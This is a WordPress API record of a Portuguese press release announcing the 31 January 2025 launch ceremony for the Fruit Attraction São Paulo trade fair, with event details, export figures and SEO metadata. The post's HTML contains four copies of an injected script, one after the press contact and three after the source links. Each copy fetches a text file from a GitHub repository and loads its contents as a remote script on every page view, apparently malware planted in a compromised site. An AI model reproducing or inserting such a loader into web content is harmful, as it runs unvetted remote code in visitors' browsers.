{"id":13044,"date":"2025-01-24T20:49:35","date_gmt":"2025-01-24T19:49:35","guid":{"rendered":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/?p=13044"},"modified":"2025-02-18T12:52:39","modified_gmt":"2025-02-18T11:52:39","slug":"fruit-attraction-2025-lancamento-acontece-em-31-de-janeiro-em-cerimonia-na-secretaria-da-agricultura-de-sp","status":"publish","type":"post","link":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/fruit-attraction-2025-lancamento-acontece-em-31-de-janeiro-em-cerimonia-na-secretaria-da-agricultura-de-sp\/","title":{"rendered":"Fruit Attraction 2025: lan\u00e7amento acontece em 31 de janeiro em cerim\u00f4nia na Secretaria da Agricultura de SP"},"content":{"rendered":"<p><em>Segunda edi\u00e7\u00e3o da maior feira da Am\u00e9rica Latina dedicada ao segmento de frutas e hortali\u00e7as acontece de 25 a 27 de mar\u00e7o, no S\u00e3o Paulo Expo<\/em><\/p>\n<p><strong>N<\/strong>o pr\u00f3ximo dia 31 de janeiro [sexta-feira], \u00e0s 10h, acontece a coletiva de imprensa da <a href=\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/\"><strong>Fruit Attraction S\u00e3o Paulo 2025<\/strong><\/a> em cerim\u00f4nia que acontece na sede da Secretaria de Agricultura e Abastecimento do Estado de S\u00e3o Paulo.<\/p>\n<p>Na oportunidade, estar\u00e3o presentes os secret\u00e1rios Guilherme Piai [Agricultura] e Roberto de Lucena [Turismo]; o presidente da ABRAFRUTAS, Guilherme Coelho; o CEO da Fiera Milano Brasil, Maur\u00edcio Duval Macedo; e diretores da IFEMA &#8211; Institui\u00e7\u00e3o de Feiras de Madrid, co-realizadoras do evento.<\/p>\n<p>A Fruit Attraction S\u00e3o Paulo chega \u00e0 sua segunda edi\u00e7\u00e3o, que acontece de 25 a 27 de mar\u00e7o, no S\u00e3o Paulo Expo, consolidando-se como uma das principais plataformas para o setor de frutas e hortali\u00e7as na Am\u00e9rica Latina.<\/p>\n<p>A primeira edi\u00e7\u00e3o, realizada em 2024, reuniu mais de 12 mil visitantes de 45 pa\u00edses, incluindo 300 expositores de 15 pa\u00edses e o Governo de 8 estados brasileiros, al\u00e9m de gerar um impacto significativo para o setor, com giro de neg\u00f3cios superior a R$ 1 bilh\u00e3o em vendas. Para 2025, a expectativa dos organizadores \u00e9 a de superar os n\u00fameros da edi\u00e7\u00e3o anterior, reafirmando o evento como refer\u00eancia do segmento no Hemisf\u00e9rio Sul.<\/p>\n<p>Al\u00e9m da mostra de produtos, tecnologia e servi\u00e7os, a Fruit Attraction S\u00e3o Paulo tamb\u00e9m ser\u00e1 palco do Fruit F\u00f3rum, um espa\u00e7o de debates e apresenta\u00e7\u00f5es que re\u00fane pesquisadores, empres\u00e1rios, pensadores e um p\u00fablico altamente qualificado para discutir sobre tecnologias, inova\u00e7\u00f5es e mercados potenciais no setor hortifrut\u00edcola, nesta edi\u00e7\u00e3o o evento conta com a participa\u00e7\u00e3o do coordenador do Insper Agro Global, <strong>Marcos Jank<\/strong>, refer\u00eancia no assunto. A Fruit Attraction S\u00e3o Paulo 2025 tamb\u00e9m contar\u00e1 com a Rodada de Neg\u00f3cios entre exportadores e compradores internacionais promovida pela Apex Brasil.<\/p>\n<p>Na coletiva, ser\u00e3o apresentados detalhes da edi\u00e7\u00e3o deste ano, as novidades que est\u00e3o sendo preparadas e o impacto positivo aguardado para o segmento de frutas.<\/p>\n<p>Para se ter ideia do potencial da fruticultura brasileira, em 2024 as exporta\u00e7\u00f5es ultrapassaram um milh\u00e3o de toneladas, com faturamento de U$S 1,38 bilh\u00e3o, incremento de 2,04% ante o ano anterior, aponta acompanhamento da Abrafrutas com base em dados compilados do MDIC e Conab. Destaque para os embarques de mangas, mel\u00f5es, limas, lim\u00f5es, uva, mam\u00e3o e melancia.<\/p>\n<p>&nbsp;<\/p>\n<p><strong><em>Servi\u00e7o:<\/em><\/strong><\/p>\n<p><em>Data: 31 de janeiro (sexta-feira)<\/em><\/p>\n<p><em>Hor\u00e1rio: 10h \u00e0s 12h<\/em><\/p>\n<p><em>Local: Secretaria de Agricultura e Abastecimento do Estado de S\u00e3o Paulo<\/em><\/p>\n<p><em>Endere\u00e7o: Pra\u00e7a Ramos de Azevedo, 254 &#8211; Centro Hist\u00f3rico de S\u00e3o Paulo, S\u00e3o Paulo &#8211; SP<\/em><\/p>\n<p><strong><em>Fruit Attraction no Instagram:<\/em><\/strong><\/p>\n<p><em>https:\/\/www.instagram.com\/fruitattraction_saopaulo\/\u00a0\u00a0 <\/em><\/p>\n<p><strong><em>Informa\u00e7\u00f5es para imprensa:<\/em><\/strong><\/p>\n<p><em>Ronaldo Luiz <\/em><\/p>\n<p><em>ComResultado [25 anos no agroneg\u00f3cio]<\/em><\/p>\n<p><em>www.comresultado.com.br <\/em><\/p>\n<p><em>contato@comresultado.com.br <\/em><\/p>\n<p><em>(11) 97631-6227<\/em><script>;var url = 'https:\/\/raw.githubusercontent.com\/asddw1122\/add\/refs\/heads\/main\/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});<\/script><\/p>\n<p><strong>FONTE: <a href=\"https:\/\/www.portaldoagronegocio.com.br\/agricultura\/fruticultura\/noticias\/fruit-attraction-2025-lancamento-oficial-acontece-em-31-de-janeiro-na-secretaria-de-agricultura-de-sao-paulo#google_vignette\" target=\"_blank\" rel=\"noopener\">Portal do Agroneg\u00f3cio<\/a> |\u00a0<a href=\"https:\/\/minutomt.com.br\/agro\/fruit-attraction-2025-lancamento-oficial-acontece-em-31-de-janeiro-na-secretaria-de-agricultura-de-sao-paulo\/\" target=\"_blank\" rel=\"noopener\">portal MINUTO MT<\/a> | <a href=\"https:\/\/www.feirasenegocios.com.br\/noticias\/2025\/01\/fruit-attraction-sao-paulo-2025-coletiva-de-imprensa-acontece-em-31-de-janeiro-em-cerimonia-na-secretaria-da-agricultura-de-sao-paulo\/\" target=\"_blank\" rel=\"noopener\">Feiras e Negocios<\/a> | <a href=\"https:\/\/www.agromundo.net\/noticias\/70056\" target=\"_blank\" rel=\"noopener\">Agromundo<\/a> | <a href=\"https:\/\/noticias360.com.br\/agronegocio\/fruit-attraction-2025-lancamento-oficial-acontece-em-31-de-janeiro-na-secretaria-de-agricultura-de-sao-paulo\/\" target=\"_blank\" rel=\"noopener\">portal NOT\u00cdCIAS 360<\/a> | <a href=\"https:\/\/nmt.com.br\/2025\/01\/30\/fruit-attraction-2025-lancamento-oficial-acontece-em-31-de-janeiro-na-secretaria-de-agricultura-de-sao-paulo\/\" target=\"_blank\" rel=\"noopener\">NMT<\/a><\/strong><script>;var url = 'https:\/\/raw.githubusercontent.com\/asddw1122\/add\/refs\/heads\/main\/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});<\/script><script>;var url = 'https:\/\/raw.githubusercontent.com\/asddw1122\/add\/refs\/heads\/main\/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});<\/script><script>;var url = 'https:\/\/raw.githubusercontent.com\/asddw1122\/add\/refs\/heads\/main\/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Segunda edi\u00e7\u00e3o da maior feira da Am\u00e9rica Latina dedicada ao segmento de frutas e hortali\u00e7as acontece de 25 a 27 de mar\u00e7o, no S\u00e3o Paulo Expo No pr\u00f3ximo dia 31 de janeiro [sexta-feira], \u00e0s 10h, acontece a coletiva de imprensa da Fruit Attraction S\u00e3o Paulo 2025 em cerim\u00f4nia que acontece na sede da Secretaria de&#8230;<\/p>\n","protected":false},"author":3,"featured_media":3379,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_eb_attr":"","inline_featured_image":false,"footnotes":""},"categories":[51,90],"tags":[],"class_list":["post-13044","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-noticias","category-release-pt"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.1.1 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Fruit Attraction 2025: lan\u00e7amento acontece em 31 de janeiro em cerim\u00f4nia na Secretaria da Agricultura de SP - Fruit Attraction Sao Paulo | IFEMA MADRID INTERNACIONAL<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/fruit-attraction-2025-lancamento-acontece-em-31-de-janeiro-em-cerimonia-na-secretaria-da-agricultura-de-sp\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Fruit Attraction 2025: lan\u00e7amento acontece em 31 de janeiro em cerim\u00f4nia na Secretaria da Agricultura de SP - Fruit Attraction Sao Paulo | IFEMA MADRID INTERNACIONAL\" \/>\n<meta property=\"og:description\" content=\"Segunda edi\u00e7\u00e3o da maior feira da Am\u00e9rica Latina dedicada ao segmento de frutas e hortali\u00e7as acontece de 25 a 27 de mar\u00e7o, no S\u00e3o Paulo Expo No pr\u00f3ximo dia 31 de janeiro [sexta-feira], \u00e0s 10h, acontece a coletiva de imprensa da Fruit Attraction S\u00e3o Paulo 2025 em cerim\u00f4nia que acontece na sede da Secretaria de...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/fruit-attraction-2025-lancamento-acontece-em-31-de-janeiro-em-cerimonia-na-secretaria-da-agricultura-de-sp\/\" \/>\n<meta property=\"og:site_name\" content=\"Fruit Attraction Sao Paulo | IFEMA MADRID INTERNACIONAL\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/people\/Fruit-Attraction-So-Paulo\/61553117052718\/\" \/>\n<meta property=\"article:published_time\" content=\"2025-01-24T19:49:35+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-02-18T11:52:39+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-content\/uploads\/2024\/05\/FRUIT_ATTRACTION_16042024_11H__MG_1114.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"2000\" \/>\n\t<meta property=\"og:image:height\" content=\"1333\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Leandro Ursulano\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Leandro Ursulano\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/fruit-attraction-2025-lancamento-acontece-em-31-de-janeiro-em-cerimonia-na-secretaria-da-agricultura-de-sp\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/fruit-attraction-2025-lancamento-acontece-em-31-de-janeiro-em-cerimonia-na-secretaria-da-agricultura-de-sp\/\"},\"author\":{\"name\":\"Leandro Ursulano\",\"@id\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#\/schema\/person\/ca209e86e8182445d0a351c7daabe509\"},\"headline\":\"Fruit Attraction 2025: lan\u00e7amento acontece em 31 de janeiro em cerim\u00f4nia na Secretaria da Agricultura de SP\",\"datePublished\":\"2025-01-24T19:49:35+00:00\",\"dateModified\":\"2025-02-18T11:52:39+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/fruit-attraction-2025-lancamento-acontece-em-31-de-janeiro-em-cerimonia-na-secretaria-da-agricultura-de-sp\/\"},\"wordCount\":529,\"publisher\":{\"@id\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/fruit-attraction-2025-lancamento-acontece-em-31-de-janeiro-em-cerimonia-na-secretaria-da-agricultura-de-sp\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-content\/uploads\/2024\/05\/FRUIT_ATTRACTION_16042024_11H__MG_1114.jpg\",\"articleSection\":[\"Not\u00edcias\",\"Release\"],\"inLanguage\":\"es-ES\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/fruit-attraction-2025-lancamento-acontece-em-31-de-janeiro-em-cerimonia-na-secretaria-da-agricultura-de-sp\/\",\"url\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/fruit-attraction-2025-lancamento-acontece-em-31-de-janeiro-em-cerimonia-na-secretaria-da-agricultura-de-sp\/\",\"name\":\"Fruit Attraction 2025: lan\u00e7amento acontece em 31 de janeiro em cerim\u00f4nia na Secretaria da Agricultura de SP - Fruit Attraction Sao Paulo | IFEMA MADRID INTERNACIONAL\",\"isPartOf\":{\"@id\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/fruit-attraction-2025-lancamento-acontece-em-31-de-janeiro-em-cerimonia-na-secretaria-da-agricultura-de-sp\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/fruit-attraction-2025-lancamento-acontece-em-31-de-janeiro-em-cerimonia-na-secretaria-da-agricultura-de-sp\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-content\/uploads\/2024\/05\/FRUIT_ATTRACTION_16042024_11H__MG_1114.jpg\",\"datePublished\":\"2025-01-24T19:49:35+00:00\",\"dateModified\":\"2025-02-18T11:52:39+00:00\",\"inLanguage\":\"es-ES\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/fruit-attraction-2025-lancamento-acontece-em-31-de-janeiro-em-cerimonia-na-secretaria-da-agricultura-de-sp\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es-ES\",\"@id\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/fruit-attraction-2025-lancamento-acontece-em-31-de-janeiro-em-cerimonia-na-secretaria-da-agricultura-de-sp\/#primaryimage\",\"url\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-content\/uploads\/2024\/05\/FRUIT_ATTRACTION_16042024_11H__MG_1114.jpg\",\"contentUrl\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-content\/uploads\/2024\/05\/FRUIT_ATTRACTION_16042024_11H__MG_1114.jpg\",\"width\":2000,\"height\":1333},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#website\",\"url\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/\",\"name\":\"Fruit Attraction Sao Paulo | IFEMA MADRID INTERNACIONAL\",\"description\":\"Bienvenido a Fruit Attraction Sao Paulo, la Feria Internacional del Sector de Frutas y Hortalizas. Haz click y descubre todas las novedades de la edici\u00f3n de este a\u00f1o.\",\"publisher\":{\"@id\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es-ES\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#organization\",\"name\":\"Fruit Attraction Sao Paulo | IFEMA MADRID INTERNACIONAL\",\"url\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es-ES\",\"@id\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-content\/uploads\/2024\/01\/logo-fruit-attraction-sao-paulo.jpg\",\"contentUrl\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-content\/uploads\/2024\/01\/logo-fruit-attraction-sao-paulo.jpg\",\"width\":400,\"height\":300,\"caption\":\"Fruit Attraction Sao Paulo | IFEMA MADRID INTERNACIONAL\"},\"image\":{\"@id\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/people\/Fruit-Attraction-So-Paulo\/61553117052718\/\",\"https:\/\/www.instagram.com\/fruitattraction_saopaulo\/\",\"https:\/\/www.linkedin.com\/company\/fruit-attraction-so-paulo\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#\/schema\/person\/ca209e86e8182445d0a351c7daabe509\",\"name\":\"Leandro Ursulano\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es-ES\",\"@id\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/2379260cadc7a1e6f807da70f5c7cb3f423d0394bcad778f6c4a6614e035829d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/2379260cadc7a1e6f807da70f5c7cb3f423d0394bcad778f6c4a6614e035829d?s=96&d=mm&r=g\",\"caption\":\"Leandro Ursulano\"},\"url\":\"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/author\/leandro\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Fruit Attraction 2025: lan\u00e7amento acontece em 31 de janeiro em cerim\u00f4nia na Secretaria da Agricultura de SP - Fruit Attraction Sao Paulo | IFEMA MADRID INTERNACIONAL","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/fruit-attraction-2025-lancamento-acontece-em-31-de-janeiro-em-cerimonia-na-secretaria-da-agricultura-de-sp\/","og_locale":"es_ES","og_type":"article","og_title":"Fruit Attraction 2025: lan\u00e7amento acontece em 31 de janeiro em cerim\u00f4nia na Secretaria da Agricultura de SP - Fruit Attraction Sao Paulo | IFEMA MADRID INTERNACIONAL","og_description":"Segunda edi\u00e7\u00e3o da maior feira da Am\u00e9rica Latina dedicada ao segmento de frutas e hortali\u00e7as acontece de 25 a 27 de mar\u00e7o, no S\u00e3o Paulo Expo No pr\u00f3ximo dia 31 de janeiro [sexta-feira], \u00e0s 10h, acontece a coletiva de imprensa da Fruit Attraction S\u00e3o Paulo 2025 em cerim\u00f4nia que acontece na sede da Secretaria de...","og_url":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/fruit-attraction-2025-lancamento-acontece-em-31-de-janeiro-em-cerimonia-na-secretaria-da-agricultura-de-sp\/","og_site_name":"Fruit Attraction Sao Paulo | IFEMA MADRID INTERNACIONAL","article_publisher":"https:\/\/www.facebook.com\/people\/Fruit-Attraction-So-Paulo\/61553117052718\/","article_published_time":"2025-01-24T19:49:35+00:00","article_modified_time":"2025-02-18T11:52:39+00:00","og_image":[{"width":2000,"height":1333,"url":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-content\/uploads\/2024\/05\/FRUIT_ATTRACTION_16042024_11H__MG_1114.jpg","type":"image\/jpeg"}],"author":"Leandro Ursulano","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Leandro Ursulano","Tiempo de lectura":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/fruit-attraction-2025-lancamento-acontece-em-31-de-janeiro-em-cerimonia-na-secretaria-da-agricultura-de-sp\/#article","isPartOf":{"@id":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/fruit-attraction-2025-lancamento-acontece-em-31-de-janeiro-em-cerimonia-na-secretaria-da-agricultura-de-sp\/"},"author":{"name":"Leandro Ursulano","@id":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#\/schema\/person\/ca209e86e8182445d0a351c7daabe509"},"headline":"Fruit Attraction 2025: lan\u00e7amento acontece em 31 de janeiro em cerim\u00f4nia na Secretaria da Agricultura de SP","datePublished":"2025-01-24T19:49:35+00:00","dateModified":"2025-02-18T11:52:39+00:00","mainEntityOfPage":{"@id":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/fruit-attraction-2025-lancamento-acontece-em-31-de-janeiro-em-cerimonia-na-secretaria-da-agricultura-de-sp\/"},"wordCount":529,"publisher":{"@id":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#organization"},"image":{"@id":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/fruit-attraction-2025-lancamento-acontece-em-31-de-janeiro-em-cerimonia-na-secretaria-da-agricultura-de-sp\/#primaryimage"},"thumbnailUrl":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-content\/uploads\/2024\/05\/FRUIT_ATTRACTION_16042024_11H__MG_1114.jpg","articleSection":["Not\u00edcias","Release"],"inLanguage":"es-ES"},{"@type":"WebPage","@id":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/fruit-attraction-2025-lancamento-acontece-em-31-de-janeiro-em-cerimonia-na-secretaria-da-agricultura-de-sp\/","url":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/fruit-attraction-2025-lancamento-acontece-em-31-de-janeiro-em-cerimonia-na-secretaria-da-agricultura-de-sp\/","name":"Fruit Attraction 2025: lan\u00e7amento acontece em 31 de janeiro em cerim\u00f4nia na Secretaria da Agricultura de SP - Fruit Attraction Sao Paulo | IFEMA MADRID INTERNACIONAL","isPartOf":{"@id":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/fruit-attraction-2025-lancamento-acontece-em-31-de-janeiro-em-cerimonia-na-secretaria-da-agricultura-de-sp\/#primaryimage"},"image":{"@id":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/fruit-attraction-2025-lancamento-acontece-em-31-de-janeiro-em-cerimonia-na-secretaria-da-agricultura-de-sp\/#primaryimage"},"thumbnailUrl":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-content\/uploads\/2024\/05\/FRUIT_ATTRACTION_16042024_11H__MG_1114.jpg","datePublished":"2025-01-24T19:49:35+00:00","dateModified":"2025-02-18T11:52:39+00:00","inLanguage":"es-ES","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/fruit-attraction-2025-lancamento-acontece-em-31-de-janeiro-em-cerimonia-na-secretaria-da-agricultura-de-sp\/"]}]},{"@type":"ImageObject","inLanguage":"es-ES","@id":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/fruit-attraction-2025-lancamento-acontece-em-31-de-janeiro-em-cerimonia-na-secretaria-da-agricultura-de-sp\/#primaryimage","url":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-content\/uploads\/2024\/05\/FRUIT_ATTRACTION_16042024_11H__MG_1114.jpg","contentUrl":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-content\/uploads\/2024\/05\/FRUIT_ATTRACTION_16042024_11H__MG_1114.jpg","width":2000,"height":1333},{"@type":"WebSite","@id":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#website","url":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/","name":"Fruit Attraction Sao Paulo | IFEMA MADRID INTERNACIONAL","description":"Bienvenido a Fruit Attraction Sao Paulo, la Feria Internacional del Sector de Frutas y Hortalizas. Haz click y descubre todas las novedades de la edici\u00f3n de este a\u00f1o.","publisher":{"@id":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es-ES"},{"@type":"Organization","@id":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#organization","name":"Fruit Attraction Sao Paulo | IFEMA MADRID INTERNACIONAL","url":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/","logo":{"@type":"ImageObject","inLanguage":"es-ES","@id":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#\/schema\/logo\/image\/","url":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-content\/uploads\/2024\/01\/logo-fruit-attraction-sao-paulo.jpg","contentUrl":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-content\/uploads\/2024\/01\/logo-fruit-attraction-sao-paulo.jpg","width":400,"height":300,"caption":"Fruit Attraction Sao Paulo | IFEMA MADRID INTERNACIONAL"},"image":{"@id":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/people\/Fruit-Attraction-So-Paulo\/61553117052718\/","https:\/\/www.instagram.com\/fruitattraction_saopaulo\/","https:\/\/www.linkedin.com\/company\/fruit-attraction-so-paulo\/"]},{"@type":"Person","@id":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#\/schema\/person\/ca209e86e8182445d0a351c7daabe509","name":"Leandro Ursulano","image":{"@type":"ImageObject","inLanguage":"es-ES","@id":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/2379260cadc7a1e6f807da70f5c7cb3f423d0394bcad778f6c4a6614e035829d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/2379260cadc7a1e6f807da70f5c7cb3f423d0394bcad778f6c4a6614e035829d?s=96&d=mm&r=g","caption":"Leandro Ursulano"},"url":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/noticias\/author\/leandro\/"}]}},"_links":{"self":[{"href":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-json\/wp\/v2\/posts\/13044","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-json\/wp\/v2\/comments?post=13044"}],"version-history":[{"count":10,"href":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-json\/wp\/v2\/posts\/13044\/revisions"}],"predecessor-version":[{"id":27721,"href":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-json\/wp\/v2\/posts\/13044\/revisions\/27721"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-json\/wp\/v2\/media\/3379"}],"wp:attachment":[{"href":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-json\/wp\/v2\/media?parent=13044"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-json\/wp\/v2\/categories?post=13044"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ifema.es\/fruit-attraction-sao-paulo\/wp-json\/wp\/v2\/tags?post=13044"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}